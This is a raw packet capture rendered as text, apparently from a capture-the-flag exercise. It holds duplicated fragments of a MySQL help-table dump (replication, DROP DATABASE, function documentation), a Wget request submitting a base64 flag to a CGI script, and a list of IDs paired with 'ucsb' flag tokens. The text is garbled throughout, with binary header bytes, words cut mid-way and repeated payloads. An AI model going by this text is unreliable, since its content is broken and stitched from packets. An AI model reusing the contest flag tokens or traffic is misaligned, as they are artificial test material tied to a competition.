òCbb0`BiET@/Ԁo0SE<@@K{  3PVtڀ & v(SL_CERT = \'cert_file_name\'\n | MASTER_SSL_KEY = \'key_file_name\'\n | MASTER_SSL_CIPHER = \'cipher_list\'\n\nChanges the parameters that the slave server uses for connecting to and\ncommunicating with the master server.\n\nMASTER_USER, MASTER_PASSWORD, MASTER_SSL,\nMASTER_SSL_CA, MASTER_SSL_CAPATH, MASTER_SSL_CERT,\nMASTER_SSL_KEY, and MASTER_SSL_CIPHER provide information for\nthe slave about how to connect to its master.\n\nThe relay log options (RELAY_LOG_FILE and RELAY_LOG_POS) are\navailable beginning with MySQL 4.0.\n\nThe SSL options\n(MASTER_SSL,\nMASTER_SSL_CA,\nMASTER_SSL_CAPATH,\nMASTER_SSL_CERT,\nMASTER_SSL_KEY,\nand\nMASTER_SSL_CIPHER)\nare available beginning with MySQL 4.1.1.\nYou can change these options even on slaves that are compiled without SSL\nsupport. They are saved to the *master.info file, but are ignored\nuntil you use a server that has SSL support enabled.\n\nIf you don\'t specify a given parameter, it keeps its old\nvalue, except as indicated in the following discussion. For example, if the password to connect to your MySQL master has\nchanged, you just need to issue these statements\nto tell the slave about the new password:\n\nmysql> STOP SLAVE; -- if replication was running\nmysql> CHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nCbbBi0`ET@/p܂Ao0E<@?Lz  3PWtڀ  v(mysql> START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position are considered no longer applicable, so if you\ndo not specify MASTER_LOG_FILE and MASTER_LOG_POS in the\nstatement, MASTER_LOG_FILE=\'\' and MASTER_LOG_POS=4 are\nsilently appended to it.\n\nMASTER_LOG_FILE and MASTER_LOG_POS are the coordinates\nat which the slave I/O thread should begin reading from the master the\nnext time the thread starts.\nIf you specify either of them, you can\'t specify RELAY_LOG_FILE or\nRELAY_LOG_POS.\nIf neither of MASTER_LOG_FILE or MASTER_LOG_POS are\nspecified, the slave uses the last coordinates of the /slave SQL thread/\nbefore CHANGE MASTER was issued. C5bb0`BiET@/Ԁo0SE<@@Kz  3PWtڀ  v(mysql> START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position are considered no longer applicable, so if you\ndo not specify MASTER_LOG_FILE and MASTER_LOG_POS in the\nstatement, MASTER_LOG_FILE=\'\' and MASTER_LOG_POS=4 are\nsilently appended to it.\n\nMASTER_LOG_FILE and MASTER_LOG_POS are the coordinates\nat which the slave I/O thread should begin reading from the master the\nnext time the thread starts.\nIf you specify either of them, you can\'t specify RELAY_LOG_FILE or\nRELAY_LOG_POS.\nIf neither of MASTER_LOG_FILE or MASTER_LOG_POS are\nspecified, the slave uses the last coordinates of the /slave SQL thread/\nbefore CHANGE MASTER was issued. CZZBi0`EL@/܂Sŀo0E4*@?U 3 P&"lX] )͌C*ZZ0`BiEL@/go0AE4*@@U 3 P&"lX] )͌CbbBi0`ET@/p܂Ao0E<@?Ly  3PWtڀ $ z(This ensures that\nreplication has no discontinuity, even if the slave SQL thread was late\ncompared to the slave I/O thread, when you just want to change, say, the\npassword to use. This safe behavior was introduced starting from MySQL\n4.0.17 and 4.1.1. (Before these versions, the coordinates used were\nthe last coordinates of the slave I/O thread before CHANGE MASTER\nwas issued. This caused the SQL thread to possibly lose some events\nfrom the master, thus breaking replication.)\n\nCHANGE MASTER /deletes all relay log files/ and starts\na new one, unless you specify RELAY_LOG_FILE or\nRELAY_LOG_POS. In that case, relay logs are kept;\nas of MySQL 4.1.1 the relay_log_purge global variable\nis set silently to 0.\n\nCHANGE MASTER TO updates the contents of the *master.info and\n*relay-log.info files.\n\nCHANGE MASTER is useful for setting up a slave when you have\nthe snapshot of the master and have recorded the log and the offset\ncorresponding to it. After loading the snapshot into the slave, you\ncan run CHANGE MASTER TO MASTER_LOG_FILE=\'log_name_on_master\',\nMASTER_LOG_POS=log_offset_on_master on the slave.\n\nExamples:\n\nmysql> CHANGE MASTER TO\n -> MASTER_HOST=\'master2.mycompany.com\',\n -> MASTER_USER=\'replication\',\n -> MASTER_PASSCZZBi0`EL@/܂Sŀo0E4,@?S 3 P6"lNG )ҌCbb0`BiET@/Ԁo0SE<@@Ky  3PWtڀ $ z(This ensures that\nreplication has no discontinuity, even if the slave SQL thread was late\ncompared to the slave I/O thread, when you just want to change, say, the\npassword to use. This safe behavior was introduced starting from MySQL\n4.0.17 and 4.1.1. (Before these versions, the coordinates used were\nthe last coordinates of the slave I/O thread before CHANGE MASTER\nwas issued. This caused the SQL thread to possibly lose some events\nfrom the master, thus breaking replication.)\n\nCHANGE MASTER /deletes all relay log files/ and starts\na new one, unless you specify RELAY_LOG_FILE or\nRELAY_LOG_POS. In that case, relay logs are kept;\nas of MySQL 4.1.1 the relay_log_purge global variable\nis set silently to 0.\n\nCHANGE MASTER TO updates the contents of the *master.info and\n*relay-log.info files.\n\nCHANGE MASTER is useful for setting up a slave when you have\nthe snapshot of the master and have recorded the log and the offset\ncorresponding to it. After loading the snapshot into the slave, you\ncan run CHANGE MASTER TO MASTER_LOG_FILE=\'log_name_on_master\',\nMASTER_LOG_POS=log_offset_on_master on the slave.\n\nExamples:\n\nmysql> CHANGE MASTER TO\n -> MASTER_HOST=\'master2.mycompany.com\',\n -> MASTER_USER=\'replication\',\n -> MASTER_PASSCZZ0`BiEL@/go0AE4,@@S 3 P6"lNG )ҌC?ZZBi0`EL@/k.o0E4]@?  P0,NP s1c]CRZZ0`BiEL@/o0AE4]@@  P0,NP s1c]C3bbBi0`ET@/p܂Ao0E<@?Lx  3PW tڀ b z(WORD=\'bigs3cret\',\n -> MASTER_PORT=3306,\n -> MASTER_LOG_FILE=\'master2-bin.001\',\n -> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHEMA} [IF EXISTS] db_name',''),(150,'TIMESTAMP FUNCTION',14,' TIMESTAMP(expr)\n TIMESTAMP(expr,expr2)\n\nWith one argument, returns the date or datetime expression expr\nas a datetime value.\nWith two arguments, adds the time expression expr2 to the\ndate or datetime expression expr and returns a datetime value.\n','mysql> SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym foC:ZZBi0`EL@/܂Sŀo0E4S6@?I 3 PtV'tZ? )ӌCJbb0`BiET@/Ԁo0SE<@@Kx  3PW tڀ b z(WORD=\'bigs3cret\',\n -> MASTER_PORT=3306,\n -> MASTER_LOG_FILE=\'master2-bin.001\',\n -> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHEMA} [IF EXISTS] db_name',''),(150,'TIMESTAMP FUNCTION',14,' TIMESTAMP(expr)\n TIMESTAMP(expr,expr2)\n\nWith one argument, returns the date or datetime expression expr\nas a datetime value.\nWith two arguments, adds the time expression expr2 to the\ndate or datetime expression expr and returns a datetime value.\n','mysql> SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym foCTZZ0`BiEL@/go0AE4S6@@I 3 PtV'tZ? )ӌCbbBi0`ET@/p܂Ao0E<@?Lw  3PWɟtڀ m z(r CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATE [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if it is not.\n','mysql> SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';Cbb0`BiET@/Ԁo0SE<@@Kw  3PWɟtڀ m z(r CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATE [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if it is not.\n','mysql> SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';CbbBi0`ET@/p܂Ao0E<@?Lv  3PWџtڀ  z(\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsText(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(160,'YEARWEEK',14,' YEARWEEK(date)\n YEARWEEK(date,start)\nReturns year and week for a date. The start argument works exactly\nlike the start argument to WEEK(). The year in the\nresult may be\ndifferent from the year in the date argument for the first and the last\nweek of the year.\n','mysql> SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturnCbb0`BiET@/Ԁo0SE<@@Kv  3PWџtڀ  z(\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsText(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(160,'YEARWEEK',14,' YEARWEEK(date)\n YEARWEEK(date,start)\nReturns year and week for a date. The start argument works exactly\nlike the start argument to WEEK(). The year in the\nresult may be\ndifferent from the year in the date argument for the first and the last\nweek of the year.\n','mysql> SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturnCZbbBi0`ET@/p܂Ao0E<@?Lu  3PWٟtڀ  (s the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100);\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. The maximum number of digits\n(M) for DECIMAL is 64. The maximum number of supported\ndecimals (D) is 30. If UNSIGNED is specified, negative\nvalues are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nAll basic calculations (+, -, *, /) with DECIMAL columns are\ndone with a precision of 64 decimal digits.\n\nBefore MySQL 5.0.3:\n\nAn unpacked fixed-point number. Behaves like a CHAR column;\n``unpacked\'\' means the number is stored as a string, using one character for\neach digit of the value. M is the total number of digits and\nD is the nuClbb0`BiET@/Ԁo0SE<@@Ku  3PWٟtڀ  (s the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100);\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. The maximum number of digits\n(M) for DECIMAL is 64. The maximum number of supported\ndecimals (D) is 30. If UNSIGNED is specified, negative\nvalues are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nAll basic calculations (+, -, *, /) with DECIMAL columns are\ndone with a precision of 64 decimal digits.\n\nBefore MySQL 5.0.3:\n\nAn unpacked fixed-point number. Behaves like a CHAR column;\n``unpacked\'\' means the number is stored as a string, using one character for\neach digit of the value. M is the total number of digits and\nD is the nuCZZBi0`EL@/܂Sŀo0E4.@?Q 3 PF"lD3 )ՌCZZBi0`EL@/܂Sŀo0E4@?r 3 PzͮC )7=vCZZ0`BiEL@/go0AE4.@@Q 3 PF"lD3 )ՌCZZʪBiEL@/o0o0oE4@@r 3 PzͮC )7=vCUBi0`E@/:Sŀo0E֔@? 3 PzͮCj )7=vGET /cgi-bin/submitflag.py?flag=MTNzEw0IAD05Fej5gUP50YgklfvEgwg3jEp1mQ== HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.0.0.10 Connection: Keep-Alive CfʪBiE@/uo0o0oE֔@@ 3 PzͮCj )7=vGET /cgi-bin/submitflag.py?flag=MTNzEw0IAD05Fej5gUP50YgklfvEgwg3jEp1mQ== HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.0.0.10 Connection: Keep-Alive CMZZBi0`EL@/܂Sŀo0E40@?O 3 PV"l:! )׌C^ZZ0`BiEL@/go0AE40@@O 3 PV"l:! )׌CGZZBiʪEL@/o0oo0E4*@@kZ 3P Czo 7=wi)CYZZ0`BiEL@/܀o0SE4*@@kZ 3P Czo 7=wi)C<bbBi0`ET@/p܂Ao0E<@?Lt  3PW tڀ s (mber of decimals. The decimal point and (for negative\nnumbers) the \'-\' sign are not counted in M, although space for\nthem is reserved. If D is 0, values have no decimal point or\nfractional part. The maximum range of DECIMAL values is the same as\nfor DOUBLE, but the actual range for a given DECIMAL column\nmay be constrained by the choice of M and D. If\nUNSIGNED is specified, negative values are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nBefore MySQL 3.23:\n\nAs just described, with the exception that the M value must be large\nenough to include the space needed for the sign and the decimal point\ncharacters.\n\n DEC[(M[,D])] [UNSIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+-----CNbb0`BiET@/Ԁo0SE<@@Kt  3PW tڀ s (mber of decimals. The decimal point and (for negative\nnumbers) the \'-\' sign are not counted in M, although space for\nthem is reserved. If D is 0, values have no decimal point or\nfractional part. The maximum range of DECIMAL values is the same as\nfor DOUBLE, but the actual range for a given DECIMAL column\nmay be constrained by the choice of M and D. If\nUNSIGNED is specified, negative values are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nBefore MySQL 3.23:\n\nAs just described, with the exception that the M value must be large\nenough to include the space needed for the sign and the decimal point\ncharacters.\n\n DEC[(M[,D])] [UNSIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+-----CbbBi0`ET@/p܂Ao0E<&@?UQ  3Pu}U  (-> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHEMA} [IF EXISTS] db_name',''),(150,'TIMESTAMP FUNCTION',14,' TIMESTAMP(expr)\n TIMESTAMP(expr,expr2)\n\nWith one argument, returns the date or datetime expression expr\nas a datetime value.\nWith two arguments, adds the time expression expr2 to the\ndate or datetime expression expr and returns a datetime value.\n','mysql> SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym for CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATECbb0`BiET@/Ԁo0SE<&@@TQ  3Pu}U  (-> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHEMA} [IF EXISTS] db_name',''),(150,'TIMESTAMP FUNCTION',14,' TIMESTAMP(expr)\n TIMESTAMP(expr,expr2)\n\nWith one argument, returns the date or datetime expression expr\nas a datetime value.\nWith two arguments, adds the time expression expr2 to the\ndate or datetime expression expr and returns a datetime value.\n','mysql> SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym for CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATECbbBi0`ET@/أ  o0E<|@?  PeZ>̀ " ^b24C5EF3E1481B3,ucsb,MTNzEwEDA2K7gs1HK7rkc7NQQPCTfx72QfBZkw==
3BD9C07D3B4CDAD39995112E6B816A06,ucsb,MTNzEwEDA2NSUiiw9s03f0J0XkpAx8Jp6uDs6Q==
908A55B96FB9E9AB3830046C7E7B34B7,ucsb,MTNzEwEDA2QEmu5clFTkDwQxNWx92PmgFU5kVw==
131E0F162E8724442973CD6339CD1471,ucsb,MTNzEwEDA2Wzmy0U1KutoA/WrvS1OGSNUmeD9w==
16C74202556FD53C136894ED78DC1BE3,ucsb,MTNzEwEDA2aFqQjEAIxNbFHEdUhwaYkG7CJRTA==
E77C0DC16AF081A2CD4535063BF80488,ucsb,MTNzEwEDA2dqFQRgnYhLZKNixNKwqoM5Bs38Ug==
A078A754B8302D2C11EDE687834D8DFA,ucsb,MTNzEwEDA2gcZRiKJXUg+gpxLvtvxr1VVU79JA==
28E9C38E357B9DA03B2B96E990998F84,ucsb,MTNzEwEDA2lT0+GbRU6ShUGyagB+vchXaVfV0A==
C906619B75073C6C1333877F03178100,ucsb,MTNzEwEDA2pJcR9uHcbVmUFP5QN+XSurvZBD5w==
A195C11AEEF4FC1DD974099FD9B363B4,ucsb,MTNzEwEDA2vJ1ooF1hI0ljARNF7D5NHCPzQ8pA==
654BAEC100FFDA583ADFACFAD6056AFC,ucsb,MTNzEwEDA2ygmGVNu5quALpLrOcVxrFXjFylhQ==
13A99B49C9CDB8B3FB6E82466EEB0328,ucsb,MTNzEwEDA2018o671b6IcLixwt/sGkMeA4AbCA==
7B69AB2FC19D1F7D25D8980DF5781332,ucsb,MTNzEwEDA24N4SfbGbngfF61FAmdKErpWod86w==
D95F928901650BE61AAD6E7A16D532A6,ucsb,MTNzEwEDA28fQzfWlWNRfAaBpMGw3HIO3QxEGg==
9146776D63EC3970F727407E1AFBEAA5,ucsb,MTNzEwEDA3AwSAA9uuDv2UnqLdt527AWc6m+hA==
D8643321360EF881C4A547C121CD19BF,ucsb,MTNzEwEDA3EzWcN6wlotk5lC&ZZBi0`EL@/܂Sŀo0E42@?M 3 P^$2 ) ׌C6bb0`BiET@/o0AE<|@@  PeZ>̀ " ^b24C5EF3E1481B3,ucsb,MTNzEwEDA2K7gs1HK7rkc7NQQPCTfx72QfBZkw==
3BD9C07D3B4CDAD39995112E6B816A06,ucsb,MTNzEwEDA2NSUiiw9s03f0J0XkpAx8Jp6uDs6Q==
908A55B96FB9E9AB3830046C7E7B34B7,ucsb,MTNzEwEDA2QEmu5clFTkDwQxNWx92PmgFU5kVw==
131E0F162E8724442973CD6339CD1471,ucsb,MTNzEwEDA2Wzmy0U1KutoA/WrvS1OGSNUmeD9w==
16C74202556FD53C136894ED78DC1BE3,ucsb,MTNzEwEDA2aFqQjEAIxNbFHEdUhwaYkG7CJRTA==
E77C0DC16AF081A2CD4535063BF80488,ucsb,MTNzEwEDA2dqFQRgnYhLZKNixNKwqoM5Bs38Ug==
A078A754B8302D2C11EDE687834D8DFA,ucsb,MTNzEwEDA2gcZRiKJXUg+gpxLvtvxr1VVU79JA==
28E9C38E357B9DA03B2B96E990998F84,ucsb,MTNzEwEDA2lT0+GbRU6ShUGyagB+vchXaVfV0A==
C906619B75073C6C1333877F03178100,ucsb,MTNzEwEDA2pJcR9uHcbVmUFP5QN+XSurvZBD5w==
A195C11AEEF4FC1DD974099FD9B363B4,ucsb,MTNzEwEDA2vJ1ooF1hI0ljARNF7D5NHCPzQ8pA==
654BAEC100FFDA583ADFACFAD6056AFC,ucsb,MTNzEwEDA2ygmGVNu5quALpLrOcVxrFXjFylhQ==
13A99B49C9CDB8B3FB6E82466EEB0328,ucsb,MTNzEwEDA2018o671b6IcLixwt/sGkMeA4AbCA==
7B69AB2FC19D1F7D25D8980DF5781332,ucsb,MTNzEwEDA24N4SfbGbngfF61FAmdKErpWod86w==
D95F928901650BE61AAD6E7A16D532A6,ucsb,MTNzEwEDA28fQzfWlWNRfAaBpMGw3HIO3QxEGg==
9146776D63EC3970F727407E1AFBEAA5,ucsb,MTNzEwEDA3AwSAA9uuDv2UnqLdt527AWc6m+hA==
D8643321360EF881C4A547C121CD19BF,ucsb,MTNzEwEDA3EzWcN6wlotk5lC@ZZ0`BiEL@/go0AE42@@M 3 P^$2 ) ׌C bbBi0`ET@/p܂Ao0E<@?Ls  3PW%tڀ  (-----------------------------------+\n| POINT(1 1) |\n+----------------------------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER privilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULLC ZZBi0`EL@/܂Sŀo0E44@?K 3 Pf't+ ) ܌C ZZBi0`EL@/1po0E4@?%  P2jQd  HcUC bb0`BiET@/Ԁo0SE<@@Ks  3PW%tڀ  (-----------------------------------+\n| POINT(1 